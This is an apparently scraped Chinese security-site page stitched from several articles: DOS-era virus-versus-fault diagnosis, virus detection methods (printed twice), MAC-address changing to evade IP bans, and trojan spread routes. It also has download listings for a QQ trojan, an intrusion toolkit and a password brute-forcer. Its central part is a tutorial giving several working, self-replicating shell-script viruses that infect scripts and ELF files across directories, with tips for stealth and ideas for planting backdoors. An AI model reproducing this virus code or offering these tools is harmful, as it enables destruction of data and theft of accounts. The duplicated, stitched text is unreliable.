⑨磁盘访问时间比平时增长;
⑩系统引导时间增长。
如果出现上述现象时, 应首先对系统的BOOT区、IO.SYS、MSDOS.SYS、COMMAND.COM、.COM、.EXE文件进行仔细检查, 并与正确的文件相比较, 如有异常现象则可能感染病毒。然后对其它文件进行检查,有无异常现象, 找出异常现象的原因。病毒与故障的区别的关键是, 一般故障只是无规律的偶然发生一次而病毒的发作总是有规律的。
这里建议使用在DOS6.0以上版本所带的MSAV软件, 它的最突出的功能是能查出所有文件的变化, 并能做出记录。
如果MSAV报告有大量的文件被改动, 则系统可能被病毒感染。
二、与病毒现象类似的硬件故障
硬件的故障范围不太广泛, 但是很容易被确认。在处理计算机的异常现象时很容易被忽略, 只有先排除硬件故障,才是解决问题的根本。
1. 系统的硬件配置
这种故障常在兼容机上发生, 由于配件的不完全兼容, 导致一些软件不能够正常运行。笔者遇到过一台兼容机, 联迅绿色节能主板, 昆腾大脚硬盘, 开始时安装小软件非常顺利, 但是安装WINDOWS时却出现了装不上的故障, 开始也怀疑病毒作怪, 在用了许多杀毒软件后也不能解决问题。后来查阅了一些资料才发现了问题所在, 因主板是节能型的,而CPU、硬盘却不是节能型的, 当安装软件的时间超过主板进入休眠时间的期限时, 主板就进入了休眠状态, 于是就由于主板、CPU、硬盘工作不协调而出现了故障。解决的办法很简单, 把主板的节能开关关掉就一切正常了。所以, 用户在自己组装计算机时应首先考虑配件的兼容性, 购买配件前应仔细阅读产品说明书。
2. 电源电压不稳定
由于计算机所使用的电源的电压不稳定, 容易导致用户文件在磁盘读写时出现丢失或被破坏的现象, 严重时将会引起系统自启动。如果用户所用的电源的电压经常性的不稳定, 为了使您的计算机更安全地工作, 建议您使用电源稳压器或不间断电源(UPS)。
3. 插件接触不良
由于计算机插件接触不良, 会使某些设备出现时好时坏的现象。例如: 显示器信号线与主机接触不良时可能会使显示器显示不稳定; 磁盘线与多功能卡接触不良时会导致磁盘读写时好时坏; 打印机电缆与主机接触不良时会造成打印机不工作或工作现象不正常; 鼠标线与串行口接触不良时会出现鼠标时动时不动的故障等等。
4. 软驱故障
用户如果使用质量低劣的磁盘或使用损坏的、发霉的磁盘, 将会把软驱磁头弄脏, 出现无法读写磁盘或读写出错等故障。遇到这种情况, 只需用清洗盘清洗磁头, 一般情况下都能排队故障。如果污染特别严重, 需要将软驱拆开, 用清洗液手工清洗。
5. 关于CMOS的问题
众所周知, CMOS中所存储的信息对计算机系统来说是十分重要的, 在微机启动时总是先要按CMOS中的信息来检测和初始化系统(当然是最基本的初始化)。在486以上的主板里, 大都有一个病毒监测开关, 用户一般情况下都设置为"ON", 这时如果安装WINDOWS95, 就会发生死机现象。原因是安装WINDOWS95时, 安装程序会修改硬盘的引导部分、系统的内部中断和中断向量表, 而病毒监测程序不允许这样做, 于是就导致了死机。 建议用户在安装新系统时, 先把CMOS中病毒监测开关关掉。另外, 系统的引导速度和一些程序的运行速度减慢也可能与CMOS有关, 因为CMOS的高级设置中有一些影子内存开关, 这也会影响系统的运行速度。
三、与病毒现象类似的软件故障
软件故障的范围比较广泛, 问题出现也比较多。对软件故障的辨认和解决也是一件很难的事情, 它需要用户有相当的软件知识和丰富的上机经验。这里介绍一些常见的症状。
1. 出现"Invalid drive specification"(非法驱动器号)
这个提示是说明用户的驱动器丢失, 如果用户原来拥有这个驱动器, 则可能是这个驱动器的主引导扇区的分区表参数破坏或是磁盘标志50AA被修改。遇到这种情况用DEBUG或NORTON等工具软件将正确的主引导扇区信息写入磁盘的主引导扇区。
2. 软件程序已被破坏(非病毒)
由于磁盘质量等问题, 文件的数据部分丢失, 而这程序还能够运行, 这时使用就会出现不正常现象, 如Format程序被破坏后, 若继续执行, 会格式化出非标准格式的磁盘, 这样就会产生一连串的错误。但是这种问题极为罕见。
3. DOS系统配置不当
DOS操作系统在启动时会去查找其系统配置文件CONFIG.SYS,并按其要求配置运行环境。如果系统环境设置不当会造成某些软件不能正常运行, 如CC++语言系统、AUTOCAD等等。原因是这些程序运行时打开的文件过多, 超过系统默认值。
4. 软件与DOS版本的兼容性
DOS操作系统自身的特点是具有向下的兼容性。但软件却不同,许多软件都要过多地受其环境的限制, 在某个版本下可正常运行的软件, 到另一个DOS版本下却不能正常运行, 许多用户就怀疑是病毒引起的。如旧版的2.13汉字系统, 在DOS 3.30下运行正常, 而在DOS6.2下运行会出现乱码现象。
5. 引导过程故障
系统引导时屏幕显示"Missing operating system"(操作系统丢失), 故障原因是硬盘的主引导程序可完成引导,但无法找到DOS系统的引导记录。造成这种现象的原因是C盘无引导记录及DOS系统文件, 或CMOS中硬盘的类型与硬盘本身的格式化时的类型不同。需要将系统文件传递到C盘上或修改CMOS配置使系统从软盘上引导。
6. 用不同的编辑软件程序
用户用一些编辑软件编辑源程序, 编辑系统会在文件的特殊地方做上一些标记。这样当源程序编译或解释执行时就会出错。例如, 用WPS的N命令编辑的文本文件, 在其头部也有版面参数,有的程序编译或解释系统却不能将之与源程序分辨开, 这样就出现了错误。
7. 有关FOXBASE问题
经常使用FOXBASE的用户可能会发现在磁盘中会生成一些"S"字符或数字命名的文件, 还会发现某些数据库文件数据丢失。这一现象与计算机病毒极为相似, 其实造成这一现象的主要原因是用户在使用FOXBASE后,没有后退到DOS状态就关掉机器, 或在使用FOXBASE中途掉。建议用户在使用FOXBASE后返回到DOS状态后才关机, 否则不但会造成上述现象, 并且会对磁盘造成损坏。
在学习、使用计算机的过程中, 可能还会遇到许许多多与病毒现象相似的软硬件故障, 所以用户要多阅读、参考有关资料, 了解检测病毒的方法, 并注意在学习、工作中积累经验, 就不难区分病毒与软硬件故障了。
如何用Shell病毒技术感染Linux脚本程序
-------------------
当然,本文需要你至少了解linux shell编程的基础知识和一星点的病毒知识.
ok!我们进入正题!
我们来看一个最原始的shell病毒,代码最能说明问题:
---------------------------------------------------------
#shellvirus I
for file in *
do
cp $0 $file
done
---------------------------------------------------------
简单吧?遍历当前文件系统的所有文件,然后覆盖所有文件.但是,我们知道linux是多用户的操作系统,它的文件是具有
保护模式的,所以以上的脚本有可能会报出一大堆的错误,所以它很快就会被管理员发现并制止它的传染.所以我们可以
为该脚本做个判断,这样隐蔽性就大大增强了:
---------------------------------------------------------
#shellvirus II
for file in *
do
if test -f $file
then
if test -x $file
then
if test -w $file
then
if grep -s echo $file >.mmm
then
cp $0 $file
fi; fi; fi; fi; fi
done
rm .mmm -f
---------------------------------------------------------
ok.我们改进了一下,加了若干的判断,判断文件是否存在,是否文件可执行,是否我们有权限写,再判断它是否是脚本程序
如果是就cp $0 $file,所以这段代码是感然该系统所有的脚本程序的,危害性还是比较大的.if grep -s echo $file>/.mmm
这句也可以这样写:if file $file | grep -s 'Bourne shell script' > /dev/nul ; then,也就是判断file是否为shell
脚本程序.
但是,脚本病毒一旦在感染完毕之后就什么也不做了,它没有象二进制病毒那样的潜伏的危害性,而且以上的脚本只是简
单的覆盖宿主而已,所以我这里利用了一下传统的二进制病毒的感染机制,效果也不错,看看下面代码:
---------------------------------------------------------
#infection
head -n 24 $0 > .test <-取自身保存到.test
for file in * <-遍历文件系统
do
if test -f $file <-判断是否为文件
then
if test -x $file <-判断文件是否可执行
then
if test -w $file <-判断文件是否可写
then
if grep -s echo $file >.mmm <-判断是否为脚本程序
then
head -n 1 $file >.mm <-提取要感染的脚本程序的第一行
if grep -s infection .mm >.mmm <-判断该文件是否已经被感染
then
rm -f .mm <-已经被感染,则跳过
else <-还未被感染
cat $file > .SAVEE <-很熟悉吧?借用了传统的二进制文件的感染机制
cat .test > $file
cat .SAVEE >> $file
fi; fi; fi; fi; fi
done
rm .test .SAVEE .mmm .mm -f
--------------------------------------------------------
程序的注解足以说明了,其实增加了潜伏的危害性,但还是特容易被发现,没办法的事情,shell脚本一般都是明文的,呵呵.不过
危害性已经相当大了.这段程序用了一个感染标志:infection来判断是否已经被感染,着在程序中可以反应出来.
ok,为了使上面的代码不容易被发现,我必须优化它,最先考虑的肯定是精练代码:
--------------------------------------------------------
#infection
for file in * ; do
if test -f $file && test -x $file && test -w $file ; then
if grep -s echo $file > /dev/nul ; then
head -n 1 $file >.mm
if grep -s infection .mm > /dev/nul ; then
rm .mm -f ; else
cat $file > .SAVEE
head -n 13 $0 > $file
cat .SAVEE >> $file
fi; fi; fi
done
rm .SAVEE .mm -f
--------------------------------------------------------
现在只有两个临时文件的产生了,代码也被精简到了13行.当然可以完全用;来把代码甚至写到1-2行,但这里我只是说明问题,就
不写出来了.
好,我们看看,shell病毒还能做哪些有用的事情,有可能我们想感染别的目录的文件,比如根目录或者是/etc,/bin等等,因为大多
数有用的系统配置脚本都存放在那些目录下,只要对上述代码稍作改动就可以实现了
--------------------------------------------------------
#infection
xtemp=$pwd <-保存当前路径
head -n 22 $0 > /.test
for dir in /* ; do <-遍历/目录
if test -d $dir ; then <-如果是目录就cd该目录
cd $dir
for file in * ; do <-遍历该目录文件
if test -f $file && test -x $file && test -w $file ; then <-确定文件是否可执行,可写
if grep -s echo $file > /dev/nul ; then <-确定是否为脚本程序
head -n 1 $file > .mm
if grep -s infection .mm > /dev/nul ; then <-确定是否已经被感染
rm .mm -f ; else
cat $file > /.SAVEE <-和前面的感染机制一样感染未被感染的脚本程序
cat /.test > $file
cat /.SAVEE >> $file
fi; fi; fi
done
cd ..
fi
done
cd $xtemp <-返回原目录
rm /.test /.SAVEE .mm -f
-------------------------------------------------------------
其实这段代码只感染了/目录下的一层目录.当然我们可以使它感染的更深,只是加几个循环而已.同样shell病毒可以做很多事情
如download后门程序,为机器自动开后门,主动去攻击联网的其他机器,取用户的email来发送传染等等.总之它的实现技术不高深,
但也比较实用,还是值得去说明一下的,呵呵.
同样,我们也可以感染elf文件,但危害性很小,这里不重点讲,给个例程大家理解一下吧
-------------------------------------------------------------
for file in * ; do
if test -f $file && test -x $file && test -w $file ; then
if file $file | grep -s 'ELF' > /dev/nul ; then
mv $file .$file
head -n 9 $0 > $file
fi; fi
done
.$0
由硬盘到内存从蛛丝马迹检测潜存的病毒
病毒要进行传染,必然会留下痕迹。生物医学病毒如此,电脑病毒也是一样。检测电脑病毒,就要到病毒寄生场所去检查,发现异常情况,并进而验明“正身”,确认电脑病毒的存在。电脑病毒静态时存储于硬盘中,被激活时驻留在内存中,因此对电脑病毒的检测可以分为对硬盘的检测和对内存的检测。
一般对硬盘进行病毒检测时,要求内存中不带病毒,因为某些电脑病毒会向检测者报告假情况。例如“4096”病毒在内存中时,查看被它感染的文件,不会发现该文件的长度已发生变化,而当在内存中没有病毒时,才会发现文件长度已经增lk了4096字节;又例如,“DIR2”病毒在内存中,用Debug程序查看被感染文件时,根本看不到“DIR2”病毒的代码,很多检测程序因此而漏过了被感染的文件;还有引导区型的“巴基斯坦智囊”病毒,当它活跃在内存中时,检查引导区就看不到病毒程序而只看到正常的引导扇区。因此,只有在要求确认某种病毒的类型和对其进行分析、研究时,才能在内存中带毒的情况下作检测工作。
从原始的、未受病毒感染的DOS系统软盘启动,可以保证内存中不带病毒。启动必须是上电启动而不是按键盘上的“Alt+Ctrl+Del”三键的那种热启动,因为某些病毒可以通过截取键盘中断,将自己驻留在内存中。检测硬盘中的病毒,启动系统软盘的DOS版本号应该等于或高于硬盘内DOS系统的版本号。如果硬盘上使用了硬盘管理软件DM、ADM,硬盘压缩存储管理软件Stacker、DoubleSpace等,启动系统软盘时应把这些软件的驱动程序包括在软盘上,并把它们写入config.sys文件中,否则用系统软盘引导启动后,将不能访问硬盘上的所有分区,使躲藏在其中的病毒逃过检查。
检测硬盘中的病毒可分成检测引导区型病毒和检测文件型病毒。这两种检测的原理上相同,但由于病毒的存储方式不同,检测方法还是有差别的。主要是基于下列四种方法:比较被检测对象与原始备份的比较法;利用病毒特征代码串进行查找的搜索法;搜索病毒体内特定位置的特征字识别法;运用反汇编技术分析被检测对象,确证是否为病毒的分析法。
比较法
这是用原始备份与被检测的引导扇区或被检测的文件进行比较的方法,可以用打印的代码清单(比如Debug的D命令输出格式)进行比较,也可用程序来进行比较(如DOS的DISKCOMP、COMP或PCTOOLS等其它软件)。比较法不需要专用的查病毒程序,只要用常规DOS软件和PCTOOLS等工具软件就可以进行,而且还可以发现那些尚不能被现有的杀毒软件发现的计算机病毒。因为病毒传播得很快,新病毒层出不穷,而目前还没有能查出一切病毒的通用程序,或通过代码分析,可以判定某个程序中是否含有病毒的查毒程序,所以只有靠比较法和分析法,或这两种方法相结合来发现新病毒。 对硬盘的主引导区或对DOS的引导扇区作检查,用比较法能发现其中的程序源代码是否发生了变化。由于要进行比较,因此保留好原始备份是非常重要的。制作备份时必须在无电脑病毒的环境里进行,制作好的备份必须妥善保管,写好标签,贴好写保护。比较法的好处是简单、方便,不用专用软件;缺点是无法确认病毒的种类名称。另外,造成被检测程序与原始备份之间差别的原因尚需进一步验证,以查明是电脑病毒造成的,还是DOS数据被偶然原因,如突然停电、程序失控、恶意程序等破坏的。这些要用到以后讲的分析法,查看变化部分代码的性质,以此来确认是否存在病毒。
搜索法
这种方法主要是对每一种病毒含有的特定字符串进行扫描,如果在被检测对象内部发现了某一种特定字节串,就表明发现了该字节串所代表的病毒。国外称这种按搜索法工作的病毒扫描软件为“Scanner”。这种病毒扫描软件由两部分组成:一部分是病毒代码库,含有经过特别选定的各种电脑病毒的代码串;另一部分是利用该代码库进行扫描的扫描程序,病毒扫描程序能识别的电脑病毒的数目完全取决于病毒代码库内所含病毒种类的多少。病毒代码串的选择是非常重要的,短小的病毒代码只有一百多个字节,长的也只有10KB字节。一定要在仔细分析程序之后选出最具代表特性的,足以将该病毒区别于其它病毒和该病毒的其它变种的代码串。一般情况下,代码串是由连续若干个字节组成的,但是有些扫描软件采用的是可变长串,即在串中包含有一个到几个“模糊”字节。扫描软件遇到这种串时,只要除“模糊”字节之外的字串都能完好匹配,就也能够判别出病毒。另外,特征串还必须能将病毒与正常的非病毒程序区,不然就会出现“假报、误报”。
特征字识别法
这是基于特征串扫描法发展起来的一种方式,运行速度较快、误报频率较低。特征字识别法只须从病毒体内抽取很少的几个关键特征字,组成特征字库。由于需要处理的字节很少,又不必进行串匹配,因此大大加快了识别速度,当被处理的程序很大时,用这种办法比较合适。由于特征字识别法更注意电脑病毒的“程序活性”,因此减少了错报的可能性。使用基于特征串扫描法的查病毒软件方法与使用基于特征字识别法的查病毒软件方法是一样的,只要运行查毒程序,就能将已知的病毒检查出来。这两种方法的使用,都须要不断地对病毒库进行扩充,一旦捕捉到病毒,经过提取特征并加入到病毒库,就能使查病毒程序多检查出一种新病毒来。
分析法
这种方法一方面可以确认被观察的磁盘引导区和程序中是否含有病毒,另一方面可以辨认病毒的类型和种类,判定是否为一种新病毒,另外还可以搞清楚病毒体的大致结构,提取用于特征识别的字节串或特征字,增添到病毒代码库中供病毒扫描和识别程序使用。同时,详细地分析病毒代码,还有助于制定相应的反病毒方案。与前三种检测病毒的方法不同,使用分析法检测病毒,除了要具有相关的知识外,还需要使用Debug、Proview等分析工具程序和专用的试验用计算机。因为即使是很精通病毒的技术人员,使用性能完善的分析软件,也不能完全保证在短时间内将病毒代码分析清楚;而病毒则有可能在被分析阶段继续传染甚至发作,把软盘、硬盘内的数据完全毁坏掉,所以分析工作必须在专门的试验用PC机上进行,不怕其中的数据被破坏。不具备必要的条件,不要轻易开始分析工作。很多电脑病毒采用了自加密、抗跟踪等技术,使得分析病毒的工作经常是冗长枯燥的。特别是某些文件型病毒的源代码可达10KB以上,与系统的牵扯层次很深,使详细的剖析工作十分复杂。病毒检测的分析法是反病毒工作中不可或缺的重要技术,任何一个性能优良的反病毒系统的研制和开发都离不开专门人员对各种病毒详尽、认真的分析。
分析法分为静态和动态两种。静态分析是指利用Debug等反汇编程序将病毒代码打印成反汇编后的程序清单进行分析,看病毒分成哪些模块,使用了哪些系统调用,采用了哪些技巧,如何将病毒感染文件的过程翻转为清除病毒、修复文件的过程,哪些代码可被用做特征码以及如何防御这种病毒等等。分析人员的素质越高,分析过程就越快,理解也就越深;动态分析则是指利用Debug等程序调试工具在内存带毒的情况下,对病毒作动态跟踪,观察病毒的具体工作过程,以进一步在静态分析的基础上理解病毒工作的原理。在病毒编码比较简单的情况下,动态分析不是必须的。但是,当病毒采用了较多的技术手段时,就必须使用动、静相结合的分析方法才能完成整个分析过程。
综上所述,利用原始备份和被检测程序相比较的方法适合于不用专用软件,可以发现异常情况的场合,是一种简单、基本的病毒检测方法;扫描特征串和识别特性字的方法更适用于广大PC机用户使用,方便而又迅速;但对新出现的病毒会出现漏检的情况,须要与分析和比较法结合使用。
通过采取技术上和管理上的措施,电脑病毒是完全可以防范的。
由硬盘到内存从蛛丝马迹检测潜存的病毒
病毒要进行传染,必然会留下痕迹。生物医学病毒如此,电脑病毒也是一样。检测电脑病毒,就要到病毒寄生场所去检查,发现异常情况,并进而验明“正身”,确认电脑病毒的存在。电脑病毒静态时存储于硬盘中,被激活时驻留在内存中,因此对电脑病毒的检测可以分为对硬盘的检测和对内存的检测。 一般对硬盘进行病毒检测时,要求内存中不带病毒,因为某些电脑病毒会向检测者报告假情况。例如“4096”病毒在内存中时,查看被它感染的文件,不会发现该文件的长度已发生变化,而当在内存中没有病毒时,才会发现文件长度已经增lk了4096字节;又例如,“DIR2”病毒在内存中,用Debug程序查看被感染文件时,根本看不到“DIR2”病毒的代码,很多检测程序因此而漏过了被感染的文件;还有引导区型的“巴基斯坦智囊”病毒,当它活跃在内存中时,检查引导区就看不到病毒程序而只看到正常的引导扇区。因此,只有在要求确认某种病毒的类型和对其进行分析、研究时,才能在内存中带毒的情况下作检测工作。 从原始的、未受病毒感染的DOS系统软盘启动,可以保证内存中不带病毒。启动必须是上电启动而不是按键盘上的“Alt+Ctrl+Del”三键的那种热启动,因为某些病毒可以通过截取键盘中断,将自己驻留在内存中。检测硬盘中的病毒,启动系统软盘的DOS版本号应该等于或高于硬盘内DOS系统的版本号。如果硬盘上使用了硬盘管理软件DM、ADM,硬盘压缩存储管理软件Stacker、DoubleSpace等,启动系统软盘时应把这些软件的驱动程序包括在软盘上,并把它们写入config.sys文件中,否则用系统软盘引导启动后,将不能访问硬盘上的所有分区,使躲藏在其中的病毒逃过检查。 检测硬盘中的病毒可分成检测引导区型病毒和检测文件型病毒。这两种检测的原理上相同,但由于病毒的存储方式不同,检测方法还是有差别的。主要是基于下列四种方法:比较被检测对象与原始备份的比较法;利用病毒特征代码串进行查找的搜索法;搜索病毒体内特定位置的特征字识别法;运用反汇编技术分析被检测对象,确证是否为病毒的分析法。 比较法 这是用原始备份与被检测的引导扇区或被检测的文件进行比较的方法,可以用打印的代码清单(比如Debug的D命令输出格式)进行比较,也可用程序来进行比较(如DOS的DISKCOMP、COMP或PCTOOLS等其它软件)。比较法不需要专用的查病毒程序,只要用常规DOS软件和PCTOOLS等工具软件就可以进行,而且还可以发现那些尚不能被现有的杀毒软件发现的计算机病毒。因为病毒传播得很快,新病毒层出不穷,而目前还没有能查出一切病毒的通用程序,或通过代码分析,可以判定某个程序中是否含有病毒的查毒程序,所以只有靠比较法和分析法,或这两种方法相结合来发现新病毒。 对硬盘的主引导区或对DOS的引导扇区作检查,用比较法能发现其中的程序源代码是否发生了变化。由于要进行比较,因此保留好原始备份是非常重要的。制作备份时必须在无电脑病毒的环境里进行,制作好的备份必须妥善保管,写好标签,贴好写保护。比较法的好处是简单、方便,不用专用软件;缺点是无法确认病毒的种类名称。另外,造成被检测程序与原始备份之间差别的原因尚需进一步验证,以查明是电脑病毒造成的,还是DOS数据被偶然原因,如突然停电、程序失控、恶意程序等破坏的。这些要用到以后讲的分析法,查看变化部分代码的性质,以此来确认是否存在病毒。 搜索法 这种方法主要是对每一种病毒含有的特定字符串进行扫描,如果在被检测对象内部发现了某一种特定字节串,就表明发现了该字节串所代表的病毒。国外称这种按搜索法工作的病毒扫描软件为“Scanner”。这种病毒扫描软件由两部分组成:一部分是病毒代码库,含有经过特别选定的各种电脑病毒的代码串;另一部分是利用该代码库进行扫描的扫描程序,病毒扫描程序能识别的电脑病毒的数目完全取决于病毒代码库内所含病毒种类的多少。病毒代码串的选择是非常重要的,短小的病毒代码只有一百多个字节,长的也只有10KB字节。一定要在仔细分析程序之后选出最具代表特性的,足以将该病毒区别于其它病毒和该病毒的其它变种的代码串。一般情况下,代码串是由连续若干个字节组成的,但是有些扫描软件采用的是可变长串,即在串中包含有一个到几个“模糊”字节。扫描软件遇到这种串时,只要除“模糊”字节之外的字串都能完好匹配,就也能够判别出病毒。另外,特征串还必须能将病毒与正常的非病毒程序区,不然就会出现“假报、误报”。 特征字识别法 这是基于特征串扫描法发展起来的一种方式,运行速度较快、误报频率较低。特征字识别法只须从病毒体内抽取很少的几个关键特征字,组成特征字库。由于需要处理的字节很少,又不必进行串匹配,因此大大加快了识别速度,当被处理的程序很大时,用这种办法比较合适。由于特征字识别法更注意电脑病毒的“程序活性”,因此减少了错报的可能性。使用基于特征串扫描法的查病毒软件方法与使用基于特征字识别法的查病毒软件方法是一样的,只要运行查毒程序,就能将已知的病毒检查出来。这两种方法的使用,都须要不断地对病毒库进行扩充,一旦捕捉到病毒,经过提取特征并加入到病毒库,就能使查病毒程序多检查出一种新病毒来。 分析法 这种方法一方面可以确认被观察的磁盘引导区和程序中是否含有病毒,另一方面可以辨认病毒的类型和种类,判定是否为一种新病毒,另外还可以搞清楚病毒体的大致结构,提取用于特征识别的字节串或特征字,增添到病毒代码库中供病毒扫描和识别程序使用。同时,详细地分析病毒代码,还有助于制定相应的反病毒方案。与前三种检测病毒的方法不同,使用分析法检测病毒,除了要具有相关的知识外,还需要使用Debug、Proview等分析工具程序和专用的试验用计算机。因为即使是很精通病毒的技术人员,使用性能完善的分析软件,也不能完全保证在短时间内将病毒代码分析清楚;而病毒则有可能在被分析阶段继续传染甚至发作,把软盘、硬盘内的数据完全毁坏掉,所以分析工作必须在专门的试验用PC机上进行,不怕其中的数据被破坏。不具备必要的条件,不要轻易开始分析工作。很多电脑病毒采用了自加密、抗跟踪等技术,使得分析病毒的工作经常是冗长枯燥的。特别是某些文件型病毒的源代码可达10KB以上,与系统的牵扯层次很深,使详细的剖析工作十分复杂。病毒检测的分析法是反病毒工作中不可或缺的重要技术,任何一个性能优良的反病毒系统的研制和开发都离不开专门人员对各种病毒详尽、认真的分析。 分析法分为静态和动态两种。静态分析是指利用Debug等反汇编程序将病毒代码打印成反汇编后的程序清单进行分析,看病毒分成哪些模块,使用了哪些系统调用,采用了哪些技巧,如何将病毒感染文件的过程翻转为清除病毒、修复文件的过程,哪些代码可被用做特征码以及如何防御这种病毒等等。分析人员的素质越高,分析过程就越快,理解也就越深;动态分析则是指利用Debug等程序调试工具在内存带毒的情况下,对病毒作动态跟踪,观察病毒的具体工作过程,以进一步在静态分析的基础上理解病毒工作的原理。在病毒编码比较简单的情况下,动态分析不是必须的。但是,当病毒采用了较多的技术手段时,就必须使用动、静相结合的分析方法才能完成整个分析过程。 综上所述,利用原始备份和被检测程序相比较的方法适合于不用专用软件,可以发现异常情况的场合,是一种简单、基本的病毒检测方法;扫描特征串和识别特性字的方法更适用于广大PC机用户使用,方便而又迅速;但对新出现的病毒会出现漏检的情况,须要与分析和比较法结合使用。 通过采取技术上和管理上的措施,电脑病毒是完全可以防范的。 |
[推荐]卡巴斯基7.0.0.60 Beta汉化版
| 软件语言: | 简体中文 | ||
| 软件类型: | 国产软件 | ||
| 运行环境: | Win9x/NT/2000/XP/2003 | ||
| 授权方式: | 免费版 | ||
| 软件大小: | 21300 K | ||
| 软件等级: | ★★★ | ||
| 整理时间: | 2007-5-1 18:32:05 | ||
| 开 发 商: | 佚名 | 录入:水土不服 | |
| 软件简介: |
| ||
| 下载地址: |
| ||
QQReg v1.42(号码申请)
| 软件语言: | 简体中文 | ||
| 软件类型: | 国产软件 | ||
| 运行环境: | Win9x/NT/2000/XP/2003 | ||
| 授权方式: | 免费版 | ||
| 软件大小: | 120 K | ||
| 软件等级: | ★★★ | ||
| 整理时间: | 2007-4-11 17:06:39 | ||
| 开 发 商: | 佚名 | 录入:水土不服 | |
| 软件简介: |
| ||
| 下载地址: |
| ||
| 胖子QQ木马 | |||
| 软件语言: | 简体中文 | ||
| 软件类型: | 国产软件 | ||
| 运行环境: | Win9x/NT/2000/XP/2003 | ||
| 授权方式: | 免费版 | ||
| 软件大小: | 880 K | ||
| 软件等级: | ★★★ | ||
| 整理时间: | 2007-4-13 17:03:18 | ||
| 开 发 商: | 佚名 | 录入:水土不服 | |
| 软件简介: |
| ||
| 下载地址: | 点击下载=>[迅雷专用] | ||
[推荐]批量135入侵工具包
qq相册密码暴破器(第二版)
| 软件语言: | 简体中文 | |
| 软件类型: | 国产软件 | |
| 运行环境: | Win9x/NT/2000/XP/2003 | |
| 授权方式: | 免费版 | |
| 软件大小: | 71 K | |
| 软件等级: | ★★★ | |
| 整理时间: | 2007-4-14 16:30:29 |
从上次的破起
每位加1234.....abcdefghijk...ABCDE...选择,或改为:或纯数字,或纯字母,或数字+字母
12个xml线程
此为asp程序,需要放到空间才可以运行
下载连接==>>>
推荐:IP被封?教你两招修改网卡MAC地址
要解决IP被封的问题根本就是要修改网卡地址,修改网卡MAC地址有多种方法:
一、直接修改
打开网络连接,在“本地连接”的小电脑图标,右键打开“属性”。如下图
点击上图的配置,在下图选择“Network Address”,然后在右侧的“值”中输入12个十六进制的数字(注意,mac地址每一位从0-F都是合法的,如00-50-8D-11-2F-9B,前3个字节表示制造商,后三个字节表示编号),单击“确定”保存设置,之后停用网络,在启用网络便可(或者重启电脑)如下图:
二、修改注册表
如果网卡不支持直接修改,就可以通过注册表来完成。
1 、在 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlClass{4D36E972-E325-11CE- BFC1-08002BE10318},之后就会看到0000 、 0001 、 0002 等主键下,查找 DriverDesc ,内容为你要修改的网卡的描述,如“ NVIDIA nforce Networking Controller”。如下图:
2 、在其下,添加一个字符串,命名为 NetworkAddress ,其值设为你要的 MAC 地址(注意地址还是连续写)。如: 00E0DDE0E0E0 。
3 、然后到其下 Ndiparams 中添加一项名为 NetworkAddress 的主键,在该主键下添加名为 default 的字符串,其值是你要设的 MAC 地址,要连续写,如: 000000000000 。(实际上这只是设置在后面提到的高级属性中的“初始值”,实际使用的 MAC 地址还是取决于在第 2 点中提到的 NetworkAddress 参数,这个参数一旦设置后,以后高级属性中的值就是 NetworkAddress 给出的值而非 default 给出的了。)
4 、在 NetworkAddress 的主键下继续添加名为 ParamDesc 的字符串,其作用为指定 NetworkAddress 主键的描述,其值可自己命名,如“ Network Address ”,这样在网卡的高级属性中就会出现 Network Address 选项,就是你刚在注册表中加的新项 NetworkAddress ,以后只要在此修改 MAC 地址就可以了。继续添加名为 Optional 的字符串,其值设为“ 1 ”,则以后当你在网卡的高级属性中选择 Network Address 项时,右边会出现“不存在”选项。
5 、重新启动你的计算机,打开网络邻居的属性,双击相应网卡项会发现有一个 Network Address 的高级设置项,可以用来直接修改 MAC 地址或恢复原来的地址。
推荐:如何能巧妙从进程中判断出病毒和木马
防止网游帐号被盗 将木马植入电脑的通道完全封死
随着网络游戏的快速发展,伴随而来却是一个不得忽视的新问题?虚拟财产失窃!经过自己长时间辛辛苦苦努力而练出来的游戏等级,和打出来的极品装备,在一夜之间,化为乌有!曾经看过一则新闻,说某人由于网络帐号被盗,心理承受不起这种打击,而跑去自杀。从这新闻里面可以看出,网游帐号在玩家的心目中是占有了非常重要的地位。
近两年,网游帐号失窃被盗可以说是频繁出现,而且问题日益严重。原因为何?归根到底,是我国没有一套完整的法律来保护虚拟财产。可以设想一下,当玩家的虚拟财产被盗窃,却无从提起诉讼,因为我们的法律对虚拟财产是否属于一种公民的合法财产没有明文的定性。虚拟财产得不到法律的承认,则虚拟财产的失窃就也自然无人问津。
无奈,只有深深的无奈。但是无奈之余,我们不能毫无行动,任由这些宵小之徒再这么嚣张下去,竟然无法从法律途径得到帮助,我们必须寻求另外有效的方法。
要治病,当然必须得知道病因所在。首先,我们要知道,到底,网络帐号是如何被盗?这个问题让我来回答,十个被盗的网游帐号里,可以说其中只有一个是在公共场合输入时不慎被人窥视从而丢失,而剩下的九个,原因都是因为电脑中了“木马”。
什么叫木马?木马其实就是那些盗号者所制造的一些恶意程序。当木马植入了你的电脑后,电脑就会被监控起来。轻者,把你的键盘操作记录下来,于注册表中收集重要的信息和口令,也就是网络的帐号与密码,当信息达指定尺寸,木马就会把把信息文件转换成邮件格式将之发送到黑客的邮箱。至于严重的,木马制作者可以像操作自己的机器一样控制您的机器,甚至可以远程监控您的所有操作。一举一动,都在别人的眼皮底下进行。
所以,我们需要做的,不是等到帐号丢了再亡羊补牢,而是要将木马植入我们电脑的通道完全封死!
要封死木马进入电脑的通道,我们必须先知道木马是通过什么途径进入我们的电脑。其实,途径来来去去也无非那几种。
第一,木马制作完成,就将木马镶进一个网站里面。接着,在QQ,MSN,雅虎通等聊天软件里不停的宣传这个网站,又或者跑去各个论坛里发帖。例如,制造者跑去某个大型游戏论坛,发个帖子说“这个地址有某某游戏的最新的脱机外挂,没时间练级的人快去下个挂机吧。”又或者说“这个网站有某某东西非常吸引人的,大家快去看看!”总之,木马制作者是千方百计去说些漂亮的语言,吸引你点击他的网站,当你经受不起诱惑点下去之后,后果可想而之。
接着就是邮件传播,木马制作者将木马制成一个邮件,接着利用群发的功能,将木马分发到各个用户的邮箱。用户打开邮箱,查看邮件时,当鼠标点击该邮件,这时,木马也随之流进你的电脑。又或者有些用户直接用微软的OutlookExprss收发信件的,当你一打开信箱,木马已经跑进了你的电脑。又或者像上面所说,有些木马制作者直接在邮件里放上镶了木马的网站,这也是途径之一。
